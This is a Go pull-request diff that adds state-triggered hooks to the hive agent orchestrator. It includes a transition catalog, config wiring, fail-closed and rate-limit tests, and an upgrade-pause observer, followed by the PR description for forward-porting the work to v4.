+	ast.Inspect(file, func(n ast.Node) bool {
+		ts, ok := n.(*ast.TypeSpec)
+		if !ok || ts.Name.Name != "Pauser" {
+			return true
+		}
+		iface, ok := ts.Type.(*ast.InterfaceType)
+		if !ok {
+			return true
+		}
+		for _, m := range iface.Methods.List {
+			for _, name := range m.Names {
+				if name.Name != "PauseAgent" {
+					t.Errorf("Pauser exposes %q: it must offer pause only — "+
+						"resuming an agent is a human decision", name.Name)
+				}
+			}
+		}
+		return false
+	})
+}
+
+// ---------------------------------------------------------------------------
+// Fail-closed posture
+// ---------------------------------------------------------------------------
+
+// TestBrokenPredicateCannotCauseAnAction: an unevaluable `when:` must be a
+// no-match. Failing OPEN here would let a broken expression trigger a pause.
+func TestBrokenPredicateCannotCauseAnAction(t *testing.T) {
+	pauser := &fakePauser{}
+	// A predicate that compiles but blows the cost budget at runtime.
+	expensive := `t.attrs.all(k, t.attrs.all(k2, t.attrs.all(k3, k.size() + k2.size() + k3.size() >= 0)))`
+
+	reg, err := Compile([]Hook{{
+		Name: "risky", On: TransitionAgentPaused, Action: ActionPause,
+		Params: map[string]string{"agent": "victim"}, When: expensive,
+	}})
+	if err != nil {
+		// Rejected at compile time is an even better outcome — fail-closed at
+		// the earliest possible point.
+		return
+	}
+
+	d := NewDispatcher(reg, quietLogger(), WithPauser(pauser))
+	attrs := map[string]string{}
+	for i := 0; i < 60; i++ {
+		attrs[strings.Repeat("k", i+1)] = strings.Repeat("v", i+1)
+	}
+	d.Fire(context.Background(), Payload{
+		Transition: TransitionAgentPaused, Agent: "a", Attrs: attrs,
+	})
+	d.Wait()
+
+	if len(pauser.all()) != 0 {
+		t.Error("a predicate that could not be evaluated must never cause an action")
+	}
+}
+
+// TestRateLimitHasNoUnlimitedSetting: every hook has a ceiling. This is what
+// stops a flapping transition from becoming a notification storm even when the
+// operator did not think about it.
+func TestRateLimitHasNoUnlimitedSetting(t *testing.T) {
+	// Unset → the default ceiling, not infinity.
+	if (Hook{}).effectiveRateLimit() != DefaultRateLimitPerMinute {
+		t.Error("an unset rate limit must fall back to the default ceiling")
+	}
+	// Zero is "use default", not "unlimited".
+	if (Hook{RateLimitPerMinute: 0}).effectiveRateLimit() <= 0 {
+		t.Error("zero must mean the default ceiling, never unlimited")
+	}
+	// The configured maximum is itself bounded.
+	if MaxRateLimitPerMinute <= 0 || MaxRateLimitPerMinute > 1000 {
+		t.Errorf("MaxRateLimitPerMinute (%d) should be a genuinely limiting ceiling",
+			MaxRateLimitPerMinute)
+	}
+}
+
+// TestDepthCapIsOne pins the documented depth-1 policy so raising it is a
+// deliberate, reviewed change rather than an incidental edit.
+func TestDepthCapIsOne(t *testing.T) {
+	if maxHookDepth != 1 {
+		t.Errorf("maxHookDepth is %d: the RFC specifies depth-1 (hook-caused "+
+			"transitions do not fire hooks); raising it needs a loop-safety argument",
+			maxHookDepth)
+	}
+}

--- a/src/pkg/hooks/transition.go
+++ b/src/pkg/hooks/transition.go
@@ -1,0 +1,254 @@
+// Package hooks implements state-triggered hooks as a first-class extension
+// point (RFC #4001): operators declare, in the PVC-backed running config, that
+// a named state transition should fire a vetted action.
+//
+// # Why this package exists
+//
+// Hive already reacts to state transitions everywhere — the governor's mode
+// changes, agent pause/resume, sweep results, escalation's red-CI reactions,
+// ACMM level changes, the #3836 upgrade kill switch. Every one of those
+// reactions is hand-rolled at its call site, which is why the upgrade-pause
+// file's own header has to warn that the pause must be honoured by every
+// delivery path "or it is a lie". This package is where the NEXT such switch
+// gets declared instead of threaded by hand.
+//
+// # Security posture (RFC #4001 maintainer position)
+//
+//   - Registration is operator-only, config-as-code. Hook definitions live in
+//     the running config under the same authz and layer provenance as any other
+//     config write. There is no runtime registration API and nothing here is
+//     agent-writable: an agent that could register hooks on its own transitions
+//     would have an escalation path.
+//   - Hooks OBSERVE and NOTIFY freely, but MUTATE only through existing audited
+//     APIs. No action in this package writes hive-state.json, the registry, or
+//     any ledger directly; mutating actions call the same audited entry points
+//     the dashboard uses, injected as narrow interfaces (see actions.go).
+//   - DECLARATIVE ONLY. The action vocabulary is a closed, vetted set
+//     (notify, pause, annotate, enqueue-approval). There is deliberately no
+//     exec/script action in this slice — that is a separate RFC with its own
+//     sandbox story. An unknown action is rejected at config-validation time,
+//     fail-closed, exactly as pkg/celtrigger rejects a malformed predicate.
+//   - Hooks fire POST-DURABLE-COMMIT, never inline in the critical path. See
+//     Dispatcher.
+//   - Loop prevention is structural: depth-1 causation, so a hook-caused
+//     transition can never itself fire hooks. See Causation.
+//
+// This file owns the TRANSITION CATALOG: the closed, named set of transitions
+// a hook may attach to, plus the typed payload each one carries.
+package hooks
+
+import (
+	"sort"
+	"strings"
+)
+
+// Transition is the name of a hookable state transition. The set is closed:
+// Registry validation rejects any `on:` value that is not in the catalog, so a
+// typo in operator config fails at load time rather than silently never firing
+// — the single most common way a declarative rules engine lies to its user.
+type Transition string
+
+// The transition catalog. Each constant names one durable state transition
+// hive already performs; the comment records where it originates so the
+// emitter and the hook stay traceable to each other.
+//
+// ADDING A TRANSITION: declare the constant here, add a catalogEntry to
+// catalog below (name, doc, and the payload fields it populates), and call
+// Dispatcher.Fire at the emitting site AFTER the durable commit. Nothing else
+// needs to change — the registry, CEL predicates, and every action work off
+// the generic Payload. That cheapness is the point of the RFC.
+const (
+	// TransitionGovernorModeChange fires when the governor commits a mode
+	// change (governor.ModeChange, appended to modeHistory).
+	TransitionGovernorModeChange Transition = "governor_mode_change"
+
+	// TransitionAgentPaused fires when an agent's paused flag is durably set,
+	// whatever the trigger (operator, governor cadence, the login detector).
+	// Payload.Trigger carries the paused_trigger provenance (#4041).
+	TransitionAgentPaused Transition = "agent_paused"
+
+	// TransitionAgentResumed fires when an agent's paused flag is durably
+	// cleared.
+	TransitionAgentResumed Transition = "agent_resumed"
+
+	// TransitionSweepCompleted fires when an auto-merge sweep finishes and its
+	// result is recorded (github.AutoMergeSweepResult).
+	TransitionSweepCompleted Transition = "sweep_completed"
+
+	// TransitionEscalationRed fires when escalation observes a red-CI state it
+	// reacts to (escalation.ObserveRed).
+	TransitionEscalationRed Transition = "escalation_red"
+
+	// TransitionACMMLevelChange fires when the ACMM autonomy level is durably
+	// changed via the audited pack-set-level path.
+	TransitionACMMLevelChange Transition = "acmm_level_change"
+
+	// TransitionUpgradePause fires on the #3836 upgrade kill switch flip — the
+	// hand-rolled prototype of exactly this mechanism. Payload.To is "on" or
+	// "off".
+	TransitionUpgradePause Transition = "upgrade_pause"
+
+	// TransitionReviewRejected fires when a human judges a review's output too
+	// low-quality and sends the work back. This is the first hook shipped
+	// end-to-end (RFC #4001's bluefin fleet-owner ask): the payload carries the
+	// PRODUCING agent's backend/model/pin metadata so a notification can
+	// deep-link the model-pin knob in the moment the quality problem is seen,
+	// rather than making the owner hunt for it in the admin UI.
+	TransitionReviewRejected Transition = "review_rejected"
+)
+
+// catalogEntry documents one transition for validation, docs generation, and
+// the operator-facing error message produced when an unknown `on:` is used.
+type catalogEntry struct {
+	// Name is the transition as written in config.
+	Name Transition
+	// Doc is a one-line description of when the transition fires.
+	Doc string
+	// Fields lists the Payload fields this transition reliably populates,
+	// which is what an operator needs to know to write a `when:` predicate.
+	Fields []string
+}
+
+// catalog is the closed set of hookable transitions, keyed by name.
+var catalog = map[Transition]catalogEntry{
+	TransitionGovernorModeChange: {
+		Name:   TransitionGovernorModeChange,
+		Doc:    "The governor committed a mode change (e.g. normal→conserve).",
+		Fields: []string{"from", "to", "reason"},
+	},
+	TransitionAgentPaused: {
+		Name:   TransitionAgentPaused,
+		Doc:    "An agent was durably paused. trigger carries the paused_trigger provenance.",
+		Fields: []string{"agent", "trigger", "reason"},
+	},
+	TransitionAgentResumed: {
+		Name:   TransitionAgentResumed,
+		Doc:    "An agent was durably resumed.",
+		Fields: []string{"agent", "trigger", "reason"},
+	},
+	TransitionSweepCompleted: {
+		Name:   TransitionSweepCompleted,
+		Doc:    "An auto-merge sweep completed and recorded its result.",
+		Fields: []string{"repo", "reason", "attrs.merged", "attrs.skipped"},
+	},
+	TransitionEscalationRed: {
+		Name:   TransitionEscalationRed,
+		Doc:    "Escalation observed a red-CI state it reacts to.",
+		Fields: []string{"repo", "agent", "reason", "attrs.pr"},
+	},
+	TransitionACMMLevelChange: {
+		Name:   TransitionACMMLevelChange,
+		Doc:    "The ACMM autonomy level changed via the audited pack-set-level path.",
+		Fields: []string{"from", "to", "actor"},
+	},
+	TransitionUpgradePause: {
+		Name:   TransitionUpgradePause,
+		Doc:    "The #3836 upgrade kill switch flipped. to is \"on\" or \"off\".",
+		Fields: []string{"to", "actor", "reason"},
+	},
+	TransitionReviewRejected: {
+		Name: TransitionReviewRejected,
+		Doc:  "A human rejected a review's output as low quality and sent the work back.",
+		Fields: []string{
+			"agent", "repo", "actor", "reason",
+			"model", "backend", "pin", "acmm_level", "attrs.pr", "attrs.model_knob_url",
+		},
+	},
+}
+
+// KnownTransitions returns the catalog's transition names in sorted order.
+// Used by config validation's error text and by the docs generator so the
+// documented set can never drift from the enforced set.
+func KnownTransitions() []Transition {
+	out := make([]Transition, 0, len(catalog))
+	for name := range catalog {
+		out = append(out, name)
+	}
+	sort.Slice(out, func(i, j int) bool { return out[i] < out[j] })
+	return out
+}
+
+// Describe returns the catalog entry for a transition and whether it is known.
+func Describe(t Transition) (catalogEntry, bool) {
+	e, ok := catalog[t]
+	return e, ok
+}
+
+// IsKnownTransition reports whether t is in the catalog. Registry validation
+// uses this to fail closed on an unknown `on:` value.
+func IsKnownTransition(t Transition) bool {
+	_, ok := catalog[t]
+	return ok
+}
+
+// transitionList renders the catalog for an operator-facing error message.
+func transitionList() string {
+	names := KnownTransitions()
+	parts := make([]string, 0, len(names))
+	for _, n := range names {
+		parts = append(parts, string(n))
+	}
+	return strings.Join(parts, ", ")
+}
+
+// Payload is the typed context a transition carries to its hooks. It is a
+// single flat struct rather than a per-transition interface deliberately: the
+// CEL `when:` predicate, the audit record, and every action work off ONE shape,
+// which is what keeps adding a transition to a constant + a catalog entry.
+//
+// Fields not meaningful for a given transition are left zero; the catalog's
+// Fields list documents which are populated where. Attrs carries anything
+// transition-specific that does not deserve a typed field.
+type Payload struct {
+	// Transition is the catalog name. Always set by Fire.
+	Transition Transition `json:"transition"`
+
+	// From and To describe a state change (governor mode, ACMM level,
+	// upgrade-pause on/off).
+	From string `json:"from,omitempty"`
+	To   string `json:"to,omitempty"`
+
+	// Agent is the agent the transition concerns, when applicable.
+	Agent string `json:"agent,omitempty"`
+	// Repo is the repository the transition concerns, e.g. "org/name".
+	Repo string `json:"repo,omitempty"`
+	// Actor is the responsible user, or "system" for hive-originated
+	// transitions. Mirrors the audit sink's actor convention.
+	Actor string `json:"actor,omitempty"`
+	// Trigger is the provenance of the transition (operator, governor,
+	// login_detector, …). For pause/resume this is the paused_trigger value.
+	Trigger string `json:"trigger,omitempty"`
+	// Reason is a short human-readable explanation.
+	Reason string `json:"reason,omitempty"`
+
+	// Model, Backend, and Pin identify the model that PRODUCED the artifact the
+	// transition concerns. These are the fields that make review_rejected
+	// actionable: the notification can name the stale pin and link its knob.
+	// Names follow pkg/tracing/semconv.go's vocabulary.
+	Model   string `json:"model,omitempty"`
+	Backend string `json:"backend,omitempty"`
+	Pin     string `json:"pin,omitempty"`
+	// ACMMLevel is the autonomy level in effect, 0 when unknown.
+	ACMMLevel int `json:"acmm_level,omitempty"`
+
+	// At is the transition time in Unix milliseconds. Fire stamps it when zero.
+	At int64 `json:"at,omitempty"`
+
+	// Attrs carries free-form transition-specific context. Exposed to CEL as
+	// a string map so predicates can read it without a schema change here.
+	Attrs map[string]string `json:"attrs,omitempty"`
+
+	// Causation records what caused this transition, and is what makes the
+	// depth-1 guard work. Never set this by hand at an emitting site — Fire
+	// manages it, and an action that causes a further transition propagates it
+	// via Causation.Child.
+	Causation Causation `json:"causation"`
+}
+
+// attr returns an Attrs value, tolerating a nil map.
+func (p Payload) attr(key string) string {
+	if p.Attrs == nil {
+		return ""
+	}
+	return p.Attrs[key]
+}

--- a/src/pkg/hooks/wire.go
+++ b/src/pkg/hooks/wire.go
@@ -1,0 +1,45 @@
+package hooks
+
+import (
+	"github.com/kubestellar/hive/pkg/config"
+)
+
+// This file is the ONLY place pkg/hooks touches pkg/config, mirroring
+// pkg/celtrigger's wire.go. Keeping the conversion isolated means the rest of
+// the package — catalog, registry, dispatcher, actions — is testable without
+// constructing a Config, and it keeps the config-shape dependency to one
+// reviewable function.
+
+// FromConfig converts the operator's `hooks:` list into the in-package form.
+// It does no validation of its own: Compile owns the closed-vocabulary checks
+// so there is exactly one fail-closed gate rather than two that can drift.
+func FromConfig(cfg *config.Config) []Hook {
+	if cfg == nil || len(cfg.Hooks) == 0 {
+		return nil
+	}
+	out := make([]Hook, 0, len(cfg.Hooks))
+	for _, h := range cfg.Hooks {
+		out = append(out, Hook{
+			Name:               h.Name,
+			On:                 Transition(h.On),
+			Action:             Action(h.Action),
+			Params:             h.Params,
+			When:               h.When,
+			RateLimitPerMinute: h.RateLimitPerMinute,
+		})
+	}
+	return out
+}
+
+// CompileFromConfig compiles the operator's `hooks:` list into a Registry.
+// A config with no hooks yields an empty Registry (not an error), which makes
+// every Fire a cheap no-op.
+func CompileFromConfig(cfg *config.Config) (*Registry, error) {
+	return Compile(FromConfig(cfg))
+}
+
+// SignatureFromConfig returns a stable identity for the config's hook list, so
+// the wiring layer can recompile only when the operator actually changed it.
+func SignatureFromConfig(cfg *config.Config) string {
+	return Signature(FromConfig(cfg))
+}

--- a/src/pkg/hub/server.go
+++ b/src/pkg/hub/server.go
@@ -912,12 +912,13 @@ type HubServer struct {
 	// durable JSON file on first use so the state survives the hub's own
 	// frequent auto-rolls; guarded by its own mutex because it is consulted on
 	// every heartbeat and every upgrade-poll cycle, never under s.mu.
-	upgradePause       UpgradePauseState
-	upgradePauseLoaded bool
-	upgradePauseMu     sync.Mutex // guards upgradePause + upgradePauseLoaded
-	httpServer         *http.Server
-	httpMu             sync.Mutex // guards httpServer (Start runs in a goroutine; Shutdown races it)
-	clusters           map[string]ClusterConfig
+	upgradePause         UpgradePauseState
+	upgradePauseLoaded   bool
+	upgradePauseMu       sync.Mutex // guards upgradePause + upgradePauseLoaded
+	upgradePauseObserver func(UpgradePauseEvent)
+	httpServer           *http.Server
+	httpMu               sync.Mutex // guards httpServer (Start runs in a goroutine; Shutdown races it)
+	clusters             map[string]ClusterConfig
 
 	// vanityHostServable overrides how the retroactive vanity-URL repair makes a
 	// vanity host servable (see makeVanityHostServable). nil in production, where

--- a/src/pkg/hub/upgrade_pause.go
+++ b/src/pkg/hub/upgrade_pause.go
@@ -65,6 +65,28 @@ type UpgradePauseState struct {
 	Spokes UpgradePauseSwitch `json:"spokes"`
 }
 
+type UpgradePauseEvent struct {
+	Target string
+	Paused bool
+	By     string
+	At     string
+}
+
+func (s *HubServer) SetUpgradePauseObserver(fn func(UpgradePauseEvent)) {
+	s.upgradePauseMu.Lock()
+	defer s.upgradePauseMu.Unlock()
+	s.upgradePauseObserver = fn
+}
+
+func (s *HubServer) emitUpgradePause(event UpgradePauseEvent) {
+	s.upgradePauseMu.Lock()
+	fn := s.upgradePauseObserver
+	s.upgradePauseMu.Unlock()
+	if fn != nil {
+		go fn(event)
+	}
+}
+
 // ensureUpgradePauseLoadedLocked loads the persisted state exactly once per
 // process. Callers must hold s.upgradePauseMu. A missing file means "nothing
 // paused" — the safe default and the pre-feature behaviour. An unreadable or
@@ -184,6 +206,11 @@ func (s *HubServer) handleSetUpgradePause(w http.ResponseWriter, r *http.Request
 	}
 	s.logger.Info("audit: upgrade pause toggled",
 		"target", body.Target, "paused", body.Paused, "by", username)
+	sw := state.Spokes
+	if body.Target == upgradePauseTargetHub {
+		sw = state.Hub
+	}
+	s.emitUpgradePause(UpgradePauseEvent{Target: body.Target, Paused: body.Paused, By: username, At: sw.At})
 	w.Header().Set("Content-Type", "application/json")
 	json.NewEncoder(w).Encode(map[string]any{"ok": true, "state": state})
 }


### PR DESCRIPTION
Fixes #4001

Forward-ports the state-triggered hooks implementation originally merged to v5 in #4056 (squash 5bc46ffe) onto current v4.

Credit: this ports the reviewed #4056 work and preserves its follow-up fixes for disarm/re-add rate limiting, bounded notify timeout, Payload.Attrs snapshots, and hook pause provenance via PauseBy.

Drift adaptations:
- Rewired agent pause/resume through PauseByCause so hook causation survives the v4 PauseBy provenance path.
- Added post-commit emitters for agent pause/resume, ACMM level change, red-CI observation, queued automerge sweep completion, and hub upgrade_pause.
- Initialized hub-mode hook dispatch from hive config when present so upgrade_pause hooks can fire in the process that owns the transition.

Validation:
- go test ./pkg/hooks ./cmd/hive ./pkg/governor ./pkg/dashboard ./pkg/hub
- go build ./...
- go vet ./...
- go test ./... (baseline unrelated local Darwin failures: cmd/bd TestResolveDirFallbackCwd path canonicalization; pkg/watchdog TestWedgedRestartNeverBlocksTickAndNeverStacks and TestDeadSessionRestartsOncePerBackoffNotPerTick)
- Mutation check: two assertion flips on new pause causation/loop tests failed as expected.
